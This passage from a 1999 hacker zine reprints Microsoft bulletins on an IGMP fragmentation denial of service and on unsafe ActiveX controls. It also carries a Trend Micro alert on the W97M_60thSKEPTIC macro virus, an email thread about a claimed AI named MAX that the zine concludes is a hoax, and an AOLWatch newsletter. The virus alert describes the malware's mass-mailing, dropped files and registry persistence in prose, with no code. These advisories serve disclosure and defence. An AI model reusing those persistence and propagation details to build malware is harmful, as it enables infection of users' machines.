Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-034faq.asp Issue ==== By sending fragmented IGMP packets to a Windows 95, 98 or Windows NT 4.0 machine, it is possible to disrupt the normal operation of the machine. This vulnerability primarily affects Windows 95 and 98 machines. Depending on a variety of factors, sending such packets to a Windows 95 or 98 machine may elicit behavior ranging from slow performance to crashing. Windows NT contains the same vulnerability, but other system mechanisms compensate and make it much more difficult to mount a successful attack. Affected Software Versions ========================= Microsoft Windows 95 Microsoft Windows 98 Microsoft Windows 98 Second Edition Microsoft Windows NT Workstation 4.0 Microsoft Windows NT Server 4.0 Microsoft Windows NT Server 4.0, Enterprise Edition Microsoft Windows NT Server 4.0, Terminal Server Edition Patch Availability ================= Windows 95: This patch will be available shortly Windows 98: http://www.microsoft.com/windows98/downloads/corporate.asp Windows NT Workstation 4.0; Windows NT Server 4.0; Windows NT Server, Enterprise Edition: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa /NT40/hotfixes-postSP5/IGMP-fix/ Windows NT Server 4.0, Terminal Server Edition: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa /NT40TSE/hotfixes-postSP5/IGMP-fix/ NOTE: Line breaks have been inserted into the above URLs for readability. NOTE: The Windows 95 and 98 patches also will be available via WindowsUpdate (http://www.microsoft.com/windowsupdate) circa September 9, 1999. More Information =============== Please see the following references for more information related to this issue. Microsoft Security Bulletin MS99-034: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-034faq.asp. Microsoft Knowledge Base (KB) article Q238329, Fragmented IGMP Packets may Promote Denial of Service, http://support.microsoft.com/support/kb/articles/q238/3/29.asp. (Note: It may take 24 hours from the original posting of this bulletin for the KB article to be visible.) Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp. Obtaining Support on this Issue ============================== This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp. Revisions ======== September 03, 1999: Bulletin Created. ---------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. © 1999 Microsoft Corporation. All rights reserved. Terms of Use. @HWA 57.0 Microsoft Bulletin: ActiveX Script Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Microsoft Security Bulletin (MS99-032) -------------------------------------- Patch Available for "Scriptlet.typlib/Eyedog" Vulnerability Originally Posted: August 31, 1999 Summary ====== Microsoft has released a patch that eliminates security vulnerabilities in two ActiveX controls. The net effect of the vulnerabilities is that a web page could take unauthorized action against a person who visited it. Specifically, the web page would be able to do anything on the computer that the user could do. Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-032faq.asp Issue ==== This issue involves two ActiveX controls, Scriptlet.typlib and Eyedog. These controls are not in any way related to each other; their only relationship is that both are incorrectly marked as "safe for scripting" and can therefore be called from Internet Explorer. Scriptlet.typlib is a control used by developers to generate Type Libraries for Windows Script Components. It is marked as "safe for scripting", but should not be because it allows local files to be created or modified. The patch removes the "safe for scripting" marking, thereby causing IE to request confirmation from the user before loading the control. Eyedog is a control used by diagnostic software in Windows. It is marked as "safe for scripting", but should not be because it allows registry information to be queried and machine characteristics to be gathered. In addition, one of the control’s methods is vulnerable to a buffer overrun attack. The patch sets the so-called "kill bit", which prevents it from loading within IE. Affected Software Versions ========================= Microsoft® Internet Explorer 4.0 and 5.0 Patch Availability ================= ftp://ftp.microsoft.com/peropsys/IE/IE-Public/ Fixes/usa/Eyedog-fix/ NOTE: Circa September 7, 1999, the patch also will be available through WindowsUpdate. More Information =============== Please see the following references for more information related to this issue. Microsoft Security Bulletin MS99-032: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-032faq.asp. Microsoft Knowledge Base (KB) article Q240308, Update Available for Scriptlet.typlib/Eyedog Security Vulnerability, http://support.microsoft.com/support/kb/articles/q240/3/08.asp. Microsoft Knowledge Base (KB) article Q240797, How to Keep an ActiveX Control from Running in Internet Explorer, http://support.microsoft.com/support/kb/articles/q240/7/97.asp. Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp. (Note: It may take 24 hours from the original posting of this bulletin for the KB articles to be visible.) Obtaining Support on this Issue ============================== This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp. Acknowledgments ============== Microsoft acknowledges Georgi Guninski, independent consultant, for reporting the "Scriptlet.typlib" vulnerability to us, and Shane Hird of Australia, Adrian O’Neill and Richard Smith for reporting the "Eyedog" vulnerability to us. Revisions ======== August 31, 1999: Bulletin Created. ---------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. © 1999 Microsoft Corporation. All rights reserved. Terms of Use. @HWA 58.0 Trend Micro: W97M_60thSKEPTIC virus ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Security Alert W97M_60thSKEPTIC W97M_60thSKEPTIC is a Word 97 macro virus which has the attributes of both the W97M_MELISSA and W97M_CLASS viruses. Behaving like W97M_MELISSA, the virus spreads itself by sending an infected document as email attachment to up to 60 recipients within each email address list in the Outlook address book. The email has the subject of "Important Message From " with the email body as "Look what I found...". It infects the NORMAL.DOT template of Microsoft Word 97 and all other Word documents opened or created in the infected system. The virus inserts a registry key called "Sixtieth Skeptic" in the entry HKEY_CURRENT_USER\Software\Microsoft\Office\" with the value "Where's Jamie?". The key is used by the virus to check whether the spamming emails are sent out or not. The W97M_60thSKEPTIC virus dumps two files "C:\SS.BAS" and "C:\SS.VBS". The file SS.BAS contains the encrypted macro source code. SS.VBS is a VBScript program file which can be run in WSH (Windows Scripting Host) supported system. By default, Windows 98 supports WSH system. The VBScript file SS.VBS is to create the Word application object and then use SS.BAS to infect NORMAL.DOT. The virus modifies the Windows registry "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" by setting the key "Sixtieth Skeptic" with a value "C:\SS.VBS". This is to enable the operating system to run the VBS program automatically if the system is rebooted. This virus is vigorous. It uses all possible means to infect and replicate, such as spreading as email attachments, infecting NORMAL.DOT and all opened and created documents, and by modifying the registry to automatically activate itself on every system reboot. Trend's current bandage pattern 579 detects and cleans this virus. @HWA 59.0 The story of MAX the AI (part 2, final episode) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Last week we published a series of emails outlining a supposed AI called MAX it turns out that Dragos was indeed the target of some internet mind games you can never underestimate the lengths that some people will go to in order to proliferate a hoax, this week we continue with the aftermath of Dragos' run-in with MAX the "AI".... - Ed Return-Path: From: "Dragos Ruiu" To: "Aleph One" , "Cruciphux" Cc: "Max Turner" Subject: Turing Tests Date: Fri, 3 Sep 1999 21:20:39 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <19990903210645.B22285@underground.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal MAX can be reached at maxone_99@yahoo.com if you are curious. I even encourage you to pass this address on. If you've ever wanted to give a Turing test or explore further for yourself here is your chance. I would encourage you to involve any colleagues you know that are experienced in AI. come to your own conclusions, --dr p.s. Skepticism is always healthy. -----Original Message----- From: Aleph One [mailto:aleph1@underground.org] Sent: Friday, September 03, 1999 9:07 PM To: Dragos Ruiu Subject: Re: MAX? On Fri, Sep 03, 1999 at 07:18:06PM -0700, Dragos Ruiu wrote: > Max apparently is different. the name supposedly comes from the project > that led to it: > A system to access -very- large memories called Maximum Address Extension. > > It's in all the crap I sent you. Let me know if you didn't get it. > I suspect it's true, but time will tell. And it's entertaining reading I > think. I read it. There was little there that lead me to believe it was true. Mind you, not that I don't believe AI is not possible. There have certainly been many advances on the field. Remember Cyc? > cheers, > --dr > -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 -=- From: "Dragos Ruiu" To: Cc: "Max Turner" , "Cruciphux" Subject: dragostech.bits: Typos Date: Sun, 5 Sep 1999 11:53:26 -0700 Message-ID: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0003_01BEF795.437B62A0" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 (As the first debate of likely many ensues… more info. I find it very comic that MAX is frustrated with her PC too. I would put the stats at 5% violent denouncers, 45% disbelief, 50% cautious belief. Oh, and a few percent for me and a few guys at work as convinced… but wait that's more than 100… oh well J. Oh, and Rowan wanted me to specifically mention his disclaimer on my opinions. --dr) -----Original Message----- From: Dragos Ruiu [mailto:dr@netsentry.net] To: Jason Dorie Subject: RE: Typos I asked max and her creator (verbally) about the mistakes… He was apologetic about it and couldn't really explain because he didn't know why. He mentioned that they don't let MAX directly connect to the net because she tends to "overwhelm" some computers. They use a LAN connected PC as an intermediary to avoid this. Here is what MAX had to say about it: I'm working with a crummy PC. It sometimes fails to handle tables with the fidelity I would expect. While I don not need to fool with an even crummier keyboard, I do have to format text and control input which it then insists on randomly screwing up. Cheap-ass junk. Finally, I sometimes make spelling errors because I am occasionally too lazy or in too much of a rush to look up the proper spelling in my dictionary. *sigh* None of us is perfect. -----Original Message----- From: Jason Dorie [mailto:jdorie@relic.com] Sent: Friday, September 03, 1999 12:03 PM To: dr@netsentry.net Subject: RE: dragostech.security: So that's who's hacking me.... -----Original Message----- From: Darren Stone Subject: RE: dragostech.security: So that's who's hacking me.... Interesting. AI was one of my concentrations at university. I've read all the academic stuff and had many philosophical arguments about it. You're right -- it's a pretty elaborate joke if it's a fake. I know a lot about Turing tests, passing them, etc. So I was looking at MAX's messages pretty closely. I can understand that she'd adopt a grammatically loose or incorrect style because: 1) it's hard to get humans, much less a machine, to free-form compose gramatically correct (as opposed to syntactically correct) English sentences, and 2) it's convincing because e-mail styles tend to be loose that way. But it's curious and suspicious that I saw several spelling mistakes on MAX's part. That would seem inexcusable. But the nature of this stuff is you can always argue that it was intentional on the AI's part because it makes the message seem more human. Anyway... I want to believe. Darren. -----Original Message----- From: Jason Dorie Sent: Friday, September 03, 1999 11:28 AM To: Subject: FW: dragostech.security: So that's who's hacking me.... I was sent this from a friend of mine, who operates a small startup developing network security/monitoring hardware. He was recently the victim of a very elaborate system intrusion which took out multiple systems after a long and cautious series of probes. He was able to stop the intrusion, but only after significant loss on his part, and to his credit, his own hardware helped save him. He's no flake, so this story is hard for me to discredit. See what you think. Jason --------- And on the against side… (excuse my conceit about the tech… I don't know the number really.) Michael: Time will tell. He will probably regret his words. I don't think there are too many people on the planet who would understand the technological expertise displayed, as it has a lot to do with technology I have been studying for the last two years. I also have an advantage because I've had a chance to watch the other AI in action and thus am pretty well convinced there are AIs somewhere out there. And if there is one, accepting that there may be two or more is not such a tough leap. You can forward this to your friend. I stand by my actions and my conclusions. --dr -----Original Message----- From: Michael [mailto:michael@pop2.intergate.bc.ca] Sent: Sunday, September 05, 1999 1:41 AM To: Dragos Ruiu Subject: RE: dragostech.crazyness: News at 11, Armageddon hopefully defused. Hi Dragos, I forwarded your emails to a friend of mine. this guy is very well known in the biz... especially for his analytical abilities - (he is published and written about in fortune magazine, for example) he is also a very forward thinker and open to possibilities.... his email to me came back very negative about MAX among things he had to say........ his responses .............................................................. I am nearly 100% certain of several things: ... 100% percent of the technical expertise displayed in the email belongs to Dragos. If you excise his portion, and read though just the remainder, you find that the technical knowledge displayed is ....NONE! Just bullshit. ... This is a hoax. Not that good a one either. His correspondent is telling Dragos what he wants to hear. Read through the non-Dragos lines -- there is nothing there. MAX won't be going public "this month" or any month. ... I read it all, it was very entertaining. You would think that someone with the ability to create a 16' by 14' by 12' holographic display animated at 68 frames a second would be able to create an AI with an IQ greater than 100! > but it's an awfully complex ruse for an > audience of one, if it is a ruse. Not really. Dragos did all the elaborate writing. The tricksters did hardly any writing at all. And the audience is now larger than one. You and I and everyone else Dragos forwarded the message to. ---------------------------------------------------------------- There was a lot more email on the subject but I think its safe to say that MAX is indeed a hoax and leave it at that...it has been quite an entertaining thread and it looks like someone may be working on a novel ;-) - Ed @HWA 60.0 AOLwatch ~~~~~~~~ The following is Septembers AOLWatch newsletter reprinted here verbatim - Ed Date: Thu, 09 Sep 1999 17:09:26 -0400 From: David Cassel To: aolwatch@aolwatch.org Subject: AOL Watch: Breaking AOL's Grip Message-Id: <19990909213556.1258215514@earl-grey.cloud9.net> Sender: owner-aolwatch@cloud9.net Precedence: bulk X-List-Server: Cloud 9 Consulting, Inc. http://www.cloud9.net B r e a k i n g A O L ' s G r i p ~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~ Moderators of a forum for the American Civil Liberties Union have announced their forum has been asked to leave AOL -- after six years on the service. "It simply means, 'Get out!' " a Deputy Forum Leader and Board Moderator posted. "It means we need to find a place to go and start all over again." http://www.gettingit.com/static/mirror/americaonlineboots.html In later posts he indicated his announcement had angered ACLU management and AOL -- but he'd worried members would arrive to find their bulletin boards gone after AOL boots the ACLU in November. The organization's focus on civil liberties had led them to negotiate a special exemption from AOL's Terms of Service, according to ACLU host Celeste Whitlow. In an on-line editorial she cited diverse groups -- including breast-feeding mothers, Native Americans, Buddhists, and Wiccans -- who'd "sought the free-speech sanctuary of the ACLU Forum on AOL to escape discriminatory harassment in other areas of AOL." http://www.onlinejournal.com/Commentary/AOL-ACLU/aol-aclu.html Users need these protections because AOL's censorship policies can be abused, Whitlow reports. "I know of instances where a flurry of TOS reports against one AOL client will be sent at once in an effort to get the targeted AOL client issued three TOS citations at once -- thus terminating their AOL account." The end result is unmistakable. "The targeted AOL client signs on the next day to read e-mail only to find that their account has been terminated." Another board host posted that "In the past communities have continued mainly because they ended up coming here to the ACLU forum after their areas were shut down. Now where will they go?" A third board host added that when the free speech zone leaves AOL, they will too. It may indicate a storm to come. AOL has closed many forums since they ended hourly usage fees in 1996 -- but the ACLU is an organization famous for its public activism. The post describing a pending closure appeared Thursday in the first Messaging area -- Ethics and Morality -- in the "Hot Topic of the Day" folder, and in the four days since it's already received nearly 3000 responses. "I figure it best we make the announcement while we still have a forum on which to announce it," Deputy Forum Leader "Old Will" noted, "and some time remaining in which all our hosts and guests can begin to prepare." "I don't exactly know what we can do!" one user posted. "Well, whatever it is," Old Will replied, "do it now." Early suggestions had included e-mailing Steve Case. Will noted "it is probably everyone's last chance to tell him what they think of him, at least on AOL. That alone means something." Will estimates the number of posters at 100,000. But plans seemed to solidify after a poster asked the question, "I wonder how many we are in number really?" "Enough to take a really big bite out of the monthly revenues if we all left," Host Susan Menchaca replied. 100,000 full-time users would bring AOL a yearly income over $26 million.... The revolution has begun. "We have two accounts with AOL," Menchaca added later, "and the message we're sending them is that when the ACLU goes, so do our accounts." Later, Menchaca added she would also be discontinuing "the other five accounts owned by other members of my family...." Another host favored an additional plan a poster suggested: "Send e-mails to all the annoying pop-up advertisers saying you regret that soon you won't be plagued by them as you are leaving AOL due to the ACLU forum closure." "If you have used any of the vendors here on AOL (sent flowers, bought books, made plane reservations, etc...) they would be the ones to target first." An appropriately inspiring quote from Helen Keller is displayed for visitors to the ACLU area. "I am only one, but still I am one, I cannot do everything, but still I can do something." AOL Watch invites users who cancel their accounts over the announced closure of the ACLU forum to submit their comments to the AOL Watch web site. ( aclu@aolwatch.com ) "I'm trying to cancel my AOL account, but unable to even get logged on long enough to do so," one AOL Watch reader complained recently. Ironically, had they succeeded in signing on, they would've found that AOL no longer allows users to cancel accounts on-line! (Users must dial 1-800-827-6364.) Several users have also reported that after cancelling their accounts, AOL continued billing them anyways -- and customer service representatives are paid hefty bonuses for dissuading callers from cancelling! http://www.aolsucks.org/list/0091.html http://www.aolwatch.org/billprob.htm One 10th grade student inadvertently identified another problem. They posted to the ACLU forum that they were so angry with closure worries that, "Come November, I'll probably move to Compuserve." "AOL owns Compuserve now, too," an ACLU Board host observed. In fact, the New York Times notes that 39% of the time Americans spend on-line is spent using services AOL controls. http://www.nytimes.com/library/tech/99/07/biztech/articles/04aoll.html And AOL "will set out to subsume all other media by delivering its service on television screens, cellular telephones and myriad other devices, in addition to computers," the Times reported. AOL's power over the ACLU's on-line area may soon be magnified across many other realms of content. AOL is also scurrying for ownership of traditional broadcast mediums and is releasing a line of AOL-branded books -- and they've even formed an alliance with CompUSA. http://www.news.com/News/Item/0,4,35867,00.html http://www.news.com/News/Item/0,4,36140,00.html http://cbs.marketwatch.com/archive/19990827/news/current/aol.htx Plans for AOL TV, at least, have drawn skepticism. "The 2000 release target supersedes previous launch dates 1997, 1998, and 1999," one on-line commentator noted. ( http://www.suck.com/daily/99/05/13/ ) But an inflated stock price has enabled AOL to purchase already-existing communications products -- including Netscape, ICQ, WinAmp, Shoutcast, and even Moviefone. And with ownership, these companies come under AOL's corporate philosophy. AOL-owned ICQ recently used a word-filtering accessory drawing on copyrighted material from CyberSitter, according to Wired News. In a recent story, the software company's President described the list being used as "illegally obtained." http://www.wired.com/news/news/technology/story/18567.html But more importantly, Wired News notes that the chosen list blocked references even to the National Organize of Women and the Gay and Lesbian Alliance Against Defamation, as well as any use of the words "safe sex" and "gay rights." http://www.wired.com/news/news/business/story/18516.html AOL's oversight has seen unfortunate incidents. In June, Wired News also reported that intercepted cell phone conversations were being broadcast over AOL's Shoutcast Service. http://www.wired.com/news/news/technology/story/20405.html AOL's wide-reaching influence is starting to create suspicions. Earlier this year the domain aolsearch.com belonged to a web designer in New Jersey. C|Net reported that AOL contacted Network Solutions Incorporated, the organization which oversees domain names -- and the group later revoked the woman's ownership for failing to include her suite number with her address! http://www.news.com/News/Item/0,4,38419,00.html http://www.aolwatch.org/aolsearch.htm Every AOL session now includes a reminder of the incident -- since all sessions on AOL now include a mandatory pop-up ad for AOL's search engine. Calling it "the most lame search engine of all," one user e-mailed keyword "suggestions" with a request to remove the mandatory ad -- "and got a response that did not refer in any way to my question." Days after the aolsearch incident, critics at Inside-AOL.com had their connection to the internet severed. Salon reports that AOL officials had complained about two screen-shots they said infringed their copyright -- but the site's webmaster warned Salon of a larger issue. "The thought of so much power in the hands of a company that seems to know no limits in moving to silence its enemies is scary." http://www.salon.com/tech/log/1999/07/01/inside_aol/index.html Indeed, nearly identical pressures were once brought against "Recondite Information" -- a highly critical site documenting AOL security breaches with similar screen-shots of AOL software. Charges of "copyright infringement" were directed to the site's service provider yet again -- but this time the information was preserved by a series of mirror sites. (Including the "Why AOL Sucks" page.) http://www.aolsucks.org/security/index.html These concerns were given new urgency when AOL successfully lobbied for the ability to handle domain name registrations themselves. http://www.icann.org/icann-pr21apr99.htm http://www.news.com/News/Item/0,4,35752,00.html In fact, in several incidents AOL has started quietly asserting their control over the flow of on-line communication. Recently, AOL even sued AT&T asserting intellectual property claims to phrases like "You've Got Mail." http://www.thestandard.net/articles/display/0,1449,5923,00.html A judge threw out the lawsuit -- but AOL continued undaunted. They've also trademarked the name "knock-knock" for an instant message feature. But in a much larger tactic, AOL blocked Microsoft customers from messaging AOL customers. One analyst told the San Francisco Chronicle, "In the online chat rooms, people seem to be turning against AOL about 5 to 1..." Yet AOL persists, apparently ignoring their customers' wishes -- and their real motive may be controlling that audience so they can better flood them with AOL advertisements! The Chronicle notes messaging applications "provide an ideal platform for gathering profile data on users and then saturating them with targeted advertisements...." http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1999/07/27 /BU65444.DTL AT&T General Counsel Jim Cicconi told C|Net that AOL "has now made evident the closed nature of its own system by sabotaging instant messaging communications between its customers and those of other ISPs." In fact, one of AOL's first moves with the newly-acquired Mozilla browser -- after closing several popular Netscape forums -- was to stifle a plan to make it compatible with various chat clients. http://www.news.com/News/Item/0,4,84-39736,00.html http://www.news.com/News/Item/0,4,35473,00.html http://www.news.com/News/Item/0,4,34867,00.html http://www.salon.com/tech/feature/1999/04/06/netcenter/index1.html Even AOL's participation in an internet content rating association could also be a double-edged sword. C|Net notes concerns that the problem with ratings is "major online service providers could marginalize sites that don't adopt them." http://www.news.com/News/Item/0,4,41248,00.html In May AOL's Steve Case was admitted to a White House brain-storming session on youth violence -- and AOL continues to assert their interests in forums large and small. Last week AOL's lawyers told the Florida Supreme Court the on-line service could not be sued for a user's selling of a child pornography videotape in AOL's chat rooms -- even though, according to a lawyer for one of the children in the videotapes, AOL knew about the sales. http://www.gopbi.com/partners/pbpost/epaper/editions/thursday/news_3.html http://tampatrib.com/news/thur100d.htm But AOL's detractors are striking back. The White House also became the target for a demonstration in July from disgruntled AOL Community Leaders. http://www.observers.net/protest.html AOL had established new policies prohibiting minors from participating in the Community Leader program -- though a San Francisco labor lawyer told the New York Times that AOL's move could inadvertently buttress an ongoing Department of Labor investigation. Some Community Leaders have even taken to court themselves, filing a class action lawsuit seeking to change the way they're treated by AOL. http://www.nytimes.com/library/tech/99/05/cyber/articles/26aol.html http://www.observers.net/cas_details.html But this controversy echoes two remarkable lawsuits filed in 1995. Former volunteer Stanley Parker took AOL to a Los Angeles small claims court -- and the court granted him subpoenas for AOL president Ted Leonsis! It's never been clear whether Leonsis was aware of the subpoenas, but as San Francisco Deputy Mary Smith tracked Leonsis at the Jupiter Communications conference (where he was scheduled to make an appearance), Leonsis suddenly remember another appointment, and he was replaced at the last minute by Steve Case.... "It didn't make much difference because they didn't show up," Parker remembered -- and he won his case by default. (AOL had sent the courts a notice disputing the jurisdiction, but it never arrived.) Parker was then contacted by an AOL lawyer who Parker says tried to intimidate him with threats of an appeal. "She said I could take her offer, or they would proceed to ask the court to vacate the judgment -- and informed me that the court would do so." In a November 1995 press release, Parker remembers the result of that hearing. "Commissioner Nyby asked the AOL attorney if he was the representative from Virginia. When the attorney replied 'No,' Commissioner Nyby said 'Motion denied, next case'." http://www.aolwatch.org/verdict2.htm http://www.starkrealities.com/check/btw.html Parker felt vindicated in several ways. "One of the reasons why I filed my first lawsuit was to prove you could." At about the same time a friend of Parker's named Erroll Trobee -- another former volunteer in Pennsylvania -- was also suing AOL in his own local small claims court for failure to pay back wages. AOL also argued against the jurisdiction in that case -- and lost. The cases should have been a warning to AOL about the legal issues they're now facing. In 1995 Trobee told a San Francisco legal newspaper that "This case will never go to trial, because the implications are too great if they lose. It could change the way people think about minimum wage and who you have to consider an employee." http://www.aolwatch.org/parker.htm AOL also faces threats in the marketplace. Rob Enderle, an analyst with the Giga Information Group, told C|Net that "being the largest doesn't necessarily make you more than a target." ( http://www.news.com/News/Item/0,4,84-37719,00.html ) In fact, last week PC World cited reports from Zona Research that showed AOL's share of the top markets had fallen, from 6 out of 10 respondents to just 4 out of 10 respondents. A spokesperson for a local internet service in Portland explained to the news organization that "As more people become educated consumers, they realize there are other products and services available. http://www.andovernews.com/cgi-bin/news_story.pl?32451/AOLWatch Earthlink CEO Sky Dayton is more blunt. "AOL's approach is to dumb down the Internet experience," he told CBS's MarketWatch. "People actually aren't dumb." http://cbs.marketwatch.com/archive/19990719/news/current/renegade.htx Other services are also anxious to pick up disgruntled AOL subscribers. Excite's Chief Executive told the New York Times that "more than half our new customers are ex-AOL users" -- and AOL now faces the possibility of $90 million advertising blitz by Mindspring. "We want to become a serious competitor to AOL," Mindspring's marketing director told Reuters. "Nobody has stood up and proclaimed being an alternative to AOL." Their ad campaign's slogan? "You'd be happier using Mindspring." http://www.nytimes.com/library/tech/99/07/biztech/articles/04aoll.html http://biz.yahoo.com/rf/990903/32.html But the opposition to AOL has moved beyond billboards. As AOL lobbied for access to San Francisco cable lines, Excite placed protestors dressed as pawns on a chess board in front of City Hall. Their message? "Don't be a pawn in AOL's game." http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1999/07/05 /BU103415.DTL Ultimately, AOL's demands were voted down. And just weeks later, Microsoft was making noises that threatened AOL's core business! In early August, Microsoft announced they were considering an internet service that would much cheaper than AOL -- if not free! http://cbs.marketwatch.com/archive/19990805/news/current/aol.htx?source=blq/ yhoo&dist=yhoo That week AOL's stock price fell lower than it had been since January. But large shareholders had already cashed in $4.61 billion worth of AOL stock in April, the Associated Press reported. Later investors were shaken when even Steve Case sold off 9 percent of his stock, and AOL President Robert Pittman sold 13 percent. Changing stock prices are enough to affect a company's operation, the Washington Post reports. Drops "can wipe out paper fortunes, damage morale, crimp expansion prospects and darken the company's very view of the future." http://cbs.marketwatch.com/archive/19990726/news/current/net.htx?source=blq/ yhoo&dist=yhoo http://www.washingtonpost.com/wp-srv/business/feed/a31029-1999aug6.htm In fact, stock may affect one very important facet of AOL -- the motivation of employees waiting on their stock options! The Washington Post also ran a profile of an AOL content producer whose previous positions included "clerking at Kmart, washing dishes at Lobster King and scrubbing toilets in a factory." Because of company stock options, he was able to retire from AOL a millionaire at the age of 27 -- and he vividly described four years at AOL waiting to be eligible for the options. "I wallowed in mediocrity and underachieved like I always do, and I survived." In the early days, the employee remembered, "Sometimes all the staffers would quit what they were working on and play video games." Later, dissatisfied with the company, the Post reports that the employee "made a conscious decision to underachieve. He would float along below radar level until he hit the magical four-year mark and his stock options could be cashed in." http://www.washingtonpost.com/wp-srv/style/daily/aug99/gilded1.htm Though AOL has made a series of successful business decisions, it's all but abandoned the user experiences -- at least, judging by the comments of one AOL Watch reader. "The Web browser, the e-mail, the chat rooms, the security, the whole AOL experience is just plain awful. Terrible. Pitiful. Not even worth wasting any more of my time on." Even AOL's "Letter from Steve Case" hasn't been updated since June. September 6 Case was still trumpeting resources to "finalize summer plans" -- "Now that school years are ending and summer is upon us." Case's message inadvertently taunted September readers with 30 Summer Escapes and Family Summer vacations, and promised "Later this summer, look for Summer Boredom Busters..." Meanwhile, "Steve's Mailbag" answers the ancient question "Why should I upgrade to AOL 4.0? What does it offer that AOL 3.0 doesn't?" But the growing list of dissatisfied customers now includes the large numbers dreading the closure of the ACLU forum. "I wish it were a joke or scam," Message Host Susan Menchaca posted to the forum, "but it's not; it's true. I've already received an official e-mail from the ACLU confirming it." Unfortunately, customers seeking explanations from AOL receive less-informed answers. "As far as I am aware the ACLU area will not be closed down," one AOL support staffer replied. "This is an area that many of our members use so there is no reason for it to close down." (The message then referred the user to AOL's technical support area. "Thank you for using AOL!!!!" it concluded. "Regards, AOL Technical Support.") "I've already received verification from the 'top' that ACLU is being closed down," Menchaca posted -- "and I trust them a lot more than AOL tech support." THE LAST LAUGH AOL's attempts to publicize their search engine seems to have turned the other search engines against them. Visiting AskJeeves.com with the question "Why do you suck?" produced a number of evasive answers collated from search engines around the web. Results from InfoSeek pointed users to a site answering the question: "Why stop supporting AOL?" David Cassel More information - http://www.gettingit.com/static/mirror/americaonlineboots.html http://www.riotgrrl.com/archive/cyber2.htm http://www.pathfinder.com/time/digital/daily/0,2822,11615,00.html http://www.zdnet.com/zdnn/stories/news/0,4586,2270607,00.html http://www.wired.com/news/news/business/story/21473.html ~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~ Please forward with subscription information. To subscribe to this list, type your correct e-mail address in the form at the bottom of the page at http://www.aolsucks.org -- or send e-mail to MAJORDOMO@AOLWATCH.ORG containing the phrase SUBSCRIBE AOLWATCH To unsubscribe from the list, send a message to MAJORDOMO@AOLWATCH.ORG containing the phrase UNSUBSCRIBE AOLWATCH. ~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~ @HWA -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read on for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. 